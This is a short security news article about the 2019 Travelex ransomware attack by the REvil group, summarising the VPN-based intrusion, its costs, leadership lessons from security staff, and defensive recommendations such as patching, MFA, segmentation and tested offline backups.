Calm Leadership and Visibility Key After Travelex Ransomware Attack

In December 2019, Travelex halted its online services after attackers deployed Sodinokibi (REvil) ransomware across its network. The group gained entry through an unpatched Pulse Secure VPN appliance exploiting CVE-2019-11510, a known flaw allowing remote code execution. Within hours, the ransomware encrypted critical systems, forcing the company to shut down its website and foreign‑exchange platforms.

The attack affected thousands of Travelex customers, though the company said no personal data was confirmed stolen. Internal records, transaction systems, and backup servers were encrypted, leading to an estimated £25 million in recovery costs and a reported $2.3 million ransom payment. Threat actors used typical REvil tactics: initial access via VPN exploit, privilege escalation using built‑in Windows utilities, lateral movement with SMB, and data encryption using the Sodinokibi payload (MITRE ATT&CK T1078, T1059, T1021, T1486). Don Gibson, who was Travelex’s security architecture lead at the time, stressed that leaders must set aside personal feelings and become a calm, clear voice for the organization. Lars Klinghammer, a DXC Technology remediation leader, warned that without knowing what assets exist and what activity is occurring, defenders cannot mount an effective defense.

The incident underscores two practical lessons for security teams. First, establish clear communication chains so executives can convey stability without delay. Second, maintain continuous asset inventory and network monitoring to detect anomalies early—tools that align with MITRE ATT&CK’s DEFEND framework. Defenders should: apply the latest Pulse Secure VPN patches (CVE-2019-11510), enforce multi‑factor authentication on remote access, segment critical networks, and deploy detection rules for Sodinokibi behaviors such as unusual PowerShell execution (T1059.001) and SMB lateral movement (T1021.002). Regularly test backup restoration and keep offline copies to limit ransomware impact. Looking ahead, watch for updates on ransomware groups shifting to double‑extortion tactics and for new advisories targeting VPN infrastructure.